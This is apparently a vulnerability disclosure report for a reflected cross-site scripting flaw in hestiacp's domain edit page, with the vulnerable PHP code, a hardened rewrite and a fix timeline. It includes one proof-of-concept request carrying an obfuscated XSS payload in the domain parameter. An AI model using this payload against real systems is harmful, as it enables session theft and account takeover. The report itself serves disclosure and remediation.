Cross-site Scripting (XSS) - Reflected in hestiacp/hestiacp

Valid

Reported on

Feb 17th 2022


Description

The user-controlled GET parameter domain in /web/edit/web/index.php is reflected into the response without sanitization or output encoding, resulting in reflected Cross-Site Scripting.

Proof of Concept

Endpoint:

GET https://{HOST}/edit/web/

// File: /web/edit/web/index.php#L28

// List domain
$v_domain = $_GET['domain'];               // User controllable parameter
if ($_SESSION['userContext'] !== 'admin') {
    if (!in_array($v_domain, $user_domains)) {
        header("Location: /list/mail/");
        exit;
    }
}

Request:

GET https://{HOST}/edit/web/?domain=<htmL/+/OnpOintEReNTEr%0d=%0d["XSS-HERE"].find(confirm)//&token=01de3634f2469d87dab9b338eaff4863
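The snippet above only checks whether a non-admin user owns the domain; nothing encodes the value before it is written into the page, and the admin context skips the check entirely. The following is an added illustration, not hestiacp's code and not the fix shipped in commit ee10e2: hypothetical helpers (render_domain_unsafe, render_domain_safe, is_valid_hostname, html_attr are assumed names) that put the defective pattern beside a hardened one which rejects values that are not syntactically a hostname and HTML-encodes on output regardless of any earlier validation.

```php
<?php
// Added example, not from the hestiacp project. All function names are
// assumptions chosen for this illustration; inputs below are constructed.

// Defective pattern: the value may have passed an ownership check, but it is
// concatenated into HTML unencoded, so quote and angle-bracket characters in
// ?domain= become markup in the response.
function render_domain_unsafe(string $domain): string {
    return '<input type="text" name="v_domain" value="' . $domain . '">';
}

// Syntactic check: RFC 1123-style labels separated by dots, 253 chars max.
// Anything that is not a plausible hostname is refused before use.
function is_valid_hostname(string $domain): bool {
    if ($domain === '' || strlen($domain) > 253) {
        return false;
    }
    return (bool) preg_match(
        '/^([a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)*[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?$/i',
        $domain
    );
}

// Output encoding for an HTML attribute context; ENT_QUOTES covers both
// quote styles so the value cannot close the attribute it sits in.
function html_attr(string $value): string {
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Hardened pattern: validate, authorize with a strict comparison, and encode.
// Rejected input is never echoed back, so there is nothing to reflect.
function render_domain_safe(string $domain, array $user_domains): string {
    if (!is_valid_hostname($domain) || !in_array($domain, $user_domains, true)) {
        if (PHP_SAPI !== 'cli') {
            http_response_code(400);
        }
        return '<p>Invalid domain.</p>';
    }
    return '<input type="text" name="v_domain" value="' . html_attr($domain) . '">';
}

// Constructed sample data for running this file from the command line.
$user_domains = ['example.com', 'shop.example.org'];
$benign  = 'example.com';
$hostile = '"><b>not-a-domain</b>';   // constructed: fails the hostname check

echo render_domain_unsafe($hostile), PHP_EOL;               // markup leaks through
echo render_domain_safe($benign, $user_domains), PHP_EOL;   // encoded, owned domain
echo render_domain_safe($hostile, $user_domains), PHP_EOL;  // rejected, not reflected
echo render_domain_safe('other.example.net', $user_domains), PHP_EOL; // valid but not owned
```

The two controls are independent on purpose: the hostname check narrows what the handler will even look at, and the encoding step protects the template even if a future code path (such as the admin branch above) reaches it without passing through the check.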

Impact

This vulnerability is capable of running malicious JavaScript code on web pages, stealing a user's cookie and gaining unauthorized access to that user's account through the stolen cookie.

We are processing your report and will contact the hestiacp team within 24 hours. a year ago
We have contacted a member of the hestiacp team and are waiting to hear back a year ago
We have sent a follow up to the hestiacp team. We will try again in 7 days. a year ago
Jaap Marcus validated this vulnerability a year ago
Faisal Fs ⚔️ has been awarded the disclosure bounty
The fix bounty is now up for grabs
Jaap Marcus
a year ago

@admin please provide a CVE for this vulnerability

Jamie Slome
a year ago

Admin


Sorted! 🎊

CVE-2022-0753

We have sent a fix follow up to the hestiacp team. We will try again in 7 days. a year ago
Jaap Marcus marked this as fixed in 1.5.9 with commit ee10e2 a year ago
The fix bounty has been dropped
This vulnerability will not receive a CVE